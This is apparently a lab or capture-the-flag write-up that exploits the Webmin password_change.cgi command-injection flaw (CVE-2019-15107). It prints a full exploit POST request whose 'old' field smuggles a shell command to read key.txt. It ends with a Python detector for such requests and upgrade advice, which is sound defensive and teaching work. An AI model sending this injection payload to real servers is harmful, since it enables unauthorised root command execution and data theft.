Webmin is a web-based Linux administration panel.
This write-up uses the exploit for CVE-2019-15107 to carry out the penetration test.
Login page (titled "Login to Webmin"): https://124.70.64.48:42749/
Capture the request with a proxy.
Exploit request:
POST /password_change.cgi HTTP/1.1
Host: 124.70.64.48:42749
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: redirect=1; testing=1; sid=2c97114272115f9e3e52307ff418b31d; sessiontest=1
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Length: 72

user=root2123&pam=&expired=2&old=23| cat < key.txt&new1=test2&new2=test2
Replace the captured request with the constructed exploit HTTPS request; the URL path now being accessed is /password_change.cgi, the password-change page.
The response indicates "login as root". The RCE is obtained through the $old variable in the last line of the original HTTPS request (this variable is attacker-controlled).
The contents of the file key.txt are returned in the response.
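A detection check for this request pattern, added here as an example and not part of the original write-up: it flags POSTs to /password_change.cgi whose `old` parameter carries shell metacharacters, which is how the injection above reaches the shell. It assumes method, path and body have already been extracted from proxy or web-server logs; the sample requests are constructed, the last one being the captured exploit body.

```python
import re
from typing import Optional
from urllib.parse import parse_qs

# Shell metacharacters that should never appear in a password submitted to
# password_change.cgi. The request captured above uses "|" and "<".
SHELL_META = re.compile(r"[|;&`$<>\n]")

def is_suspicious_password_change(method: str, path: str, body: str) -> Optional[dict]:
    """Return a finding if a request looks like a CVE-2019-15107 attempt, else None."""
    if method.upper() != "POST" or not path.startswith("/password_change.cgi"):
        return None
    params = parse_qs(body, keep_blank_values=True)
    old = params.get("old", [""])[0]  # the parameter the vulnerable CGI passed to the shell
    hits = sorted(set(SHELL_META.findall(old)))
    if not hits:
        return None
    return {
        "path": path,
        "user": params.get("user", [""])[0],
        "expired": params.get("expired", [""])[0],
        "old": old,
        "metachars": hits,
    }

def scan(requests):
    """Apply the check to (method, path, body) tuples and collect findings."""
    findings = []
    for method, path, body in requests:
        finding = is_suspicious_password_change(method, path, body)
        if finding:
            findings.append(finding)
    return findings

# Constructed sample traffic: a normal login, a legitimate password change,
# and the exploit body from the captured request above.
SAMPLE_REQUESTS = [
    ("POST", "/session_login.cgi", "user=alice&pass=Secret1"),
    ("POST", "/password_change.cgi",
     "user=alice&pam=&expired=2&old=Secret1&new1=Secret2&new2=Secret2"),
    ("POST", "/password_change.cgi",
     "user=root2123&pam=&expired=2&old=23| cat < key.txt&new1=test2&new2=test2"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_REQUESTS):
        print(f"ALERT user={f['user']!r} metachars={f['metachars']} old={f['old']!r}")
```

Upgrading to Webmin 1.930 or later removes the vulnerable code path; the check above remains useful for spotting attempts against hosts that have not yet been patched.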